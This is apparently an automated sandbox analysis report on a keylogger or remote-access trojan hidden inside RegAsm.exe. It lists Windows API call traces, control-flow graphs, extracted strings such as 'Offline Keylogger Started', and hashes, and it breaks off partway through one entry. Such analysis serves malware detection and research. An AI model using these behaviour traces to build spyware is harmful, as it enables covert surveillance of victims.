                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                        • API String ID: 2490988753-744132762
                                                                                                                                        • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                        • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                        • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                        • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                          • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                          • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                          • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                          • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                        • API String ID: 3795512280-1152054767
                                                                                                                                        • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                        • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                        • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                        • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1412 4048c8-4048e8 connect 1413 404a1b-404a1f 1412->1413 1414 4048ee-4048f1 1412->1414 1417 404a21-404a2f WSAGetLastError 1413->1417 1418 404a97 1413->1418 1415 404a17-404a19 1414->1415 1416 4048f7-4048fa 1414->1416 1419 404a99-404a9e 1415->1419 1420 404926-404930 call 420cf1 1416->1420 1421 4048fc-404923 call 40531e call 402093 call 41b580 1416->1421 1417->1418 1422 404a31-404a34 1417->1422 1418->1419 1434 404941-40494e call 420f20 1420->1434 1435 404932-40493c 1420->1435 1421->1420 1424 404a71-404a76 1422->1424 1425 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1422->1425 1427 404a7b-404a94 call 402093 * 2 call 41b580 1424->1427 1425->1418 1427->1418 1444 404950-404973 call 402093 * 2 call 41b580 1434->1444 1445 404987-404992 call 421ad1 1434->1445 1435->1427 1474 404976-404982 call 420d31 1444->1474 1458 4049c4-4049d1 call 420e97 1445->1458 1459 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1445->1459 1471 4049d3-4049f6 call 402093 * 2 call 41b580 1458->1471 1472 4049f9-404a14 CreateEventW * 2 1458->1472 1459->1474 1471->1472 1472->1415 1474->1418
                                                                                                                                        APIs
                                                                                                                                        • connect.WS2_32(FFFFFFFF,00364948,00000010), ref: 004048E0
                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                        • String ID: I6$Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                        • API String ID: 994465650-701701066
                                                                                                                                        • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                        • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                        • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                        • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3658366068-0
                                                                                                                                        • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                        • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                        • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                        • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                        • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                        • API String ID: 911427763-3954389425
                                                                                                                                        • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                        • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                        • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                        • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1584 40da6f-40da94 call 401f86 1587 40da9a 1584->1587 1588 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1584->1588 1590 40dae0-40dae7 call 41c048 1587->1590 1591 40daa1-40daa6 1587->1591 1592 40db93-40db98 1587->1592 1593 40dad6-40dadb 1587->1593 1594 40dba9 1587->1594 1595 40db9a-40db9f call 43c11f 1587->1595 1596 40daab-40dab9 call 41b645 call 401f13 1587->1596 1597 40dacc-40dad1 1587->1597 1598 40db8c-40db91 1587->1598 1610 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1610 1611 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1611 1600 40dbae-40dbb3 call 43c11f 1591->1600 1592->1600 1593->1600 1594->1600 1606 40dba4-40dba7 1595->1606 1618 40dabe 1596->1618 1597->1600 1598->1600 1612 40dbb4-40dbb9 call 409092 1600->1612 1606->1594 1606->1612 1623 40dac2-40dac7 call 401f09 1610->1623 1611->1618 1612->1588 1618->1623 1623->1588
                                                                                                                                        APIs
                                                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongNamePath
                                                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                        • API String ID: 82841172-425784914
                                                                                                                                        • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                        • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                        • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                        • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1683 44acc9-44ace2 1684 44ace4-44acf4 call 4467e6 1683->1684 1685 44acf8-44acfd 1683->1685 1684->1685 1692 44acf6 1684->1692 1687 44acff-44ad07 1685->1687 1688 44ad0a-44ad2e MultiByteToWideChar 1685->1688 1687->1688 1690 44ad34-44ad40 1688->1690 1691 44aec1-44aed4 call 43502b 1688->1691 1693 44ad94 1690->1693 1694 44ad42-44ad53 1690->1694 1692->1685 1696 44ad96-44ad98 1693->1696 1697 44ad55-44ad64 call 457210 1694->1697 1698 44ad72-44ad83 call 4461b8 1694->1698 1700 44aeb6 1696->1700 1701 44ad9e-44adb1 MultiByteToWideChar 1696->1701 1697->1700 1711 44ad6a-44ad70 1697->1711 1698->1700 1708 44ad89 1698->1708 1705 44aeb8-44aebf call 435ecd 1700->1705 1701->1700 1704 44adb7-44adc9 call 448c33 1701->1704 1713 44adce-44add2 1704->1713 1705->1691 1712 44ad8f-44ad92 1708->1712 1711->1712 1712->1696 1713->1700 1715 44add8-44addf 1713->1715 1716 44ade1-44ade6 1715->1716 1717 44ae19-44ae25 1715->1717 1716->1705 1720 44adec-44adee 1716->1720 1718 44ae27-44ae38 1717->1718 1719 44ae71 1717->1719 1721 44ae53-44ae64 call 4461b8 1718->1721 1722 44ae3a-44ae49 call 457210 1718->1722 1723 44ae73-44ae75 1719->1723 1720->1700 1724 44adf4-44ae0e call 448c33 1720->1724 1728 44aeaf-44aeb5 call 435ecd 1721->1728 1737 44ae66 1721->1737 1722->1728 1735 44ae4b-44ae51 1722->1735 1727 44ae77-44ae90 call 448c33 1723->1727 1723->1728 1724->1705 1739 44ae14 1724->1739 1727->1728 1741 44ae92-44ae99 1727->1741 1728->1700 1740 44ae6c-44ae6f 1735->1740 1737->1740 1739->1700 1740->1723 1742 44aed5-44aedb 1741->1742 1743 44ae9b-44ae9c 1741->1743 1744 44ae9d-44aead WideCharToMultiByte 1742->1744 1743->1744 1744->1728 1745 44aedd-44aee4 call 435ecd 1744->1745 1745->1705
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                        • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                        • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3864826663-0
                                                                                                                                        • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                        • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                        • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                        • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                        • String ID: xpF
                                                                                                                                        • API String ID: 1852769593-354647465
                                                                                                                                        • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                        • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                        • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                        • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                          • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                          • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                          • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                          • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                        • API String ID: 782494840-2070987746
                                                                                                                                        • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                        • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                        • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                        • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                        • __freea.LIBCMT ref: 10008A08
                                                                                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                        • __freea.LIBCMT ref: 10008A11
                                                                                                                                        • __freea.LIBCMT ref: 10008A36
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                        • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                        • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                        • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                        • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                        • String ID: XQG
                                                                                                                                        • API String ID: 1958988193-3606453820
                                                                                                                                        • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                        • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                        • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                        • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountEventTick
                                                                                                                                        • String ID: !D@$NG
                                                                                                                                        • API String ID: 180926312-2721294649
                                                                                                                                        • Opcode ID: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                                        • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                        • Opcode Fuzzy Hash: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
                                                                                                                                        • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                        • String ID: Offline Keylogger Started
                                                                                                                                        • API String ID: 465354869-4114347211
                                                                                                                                        • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                        • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
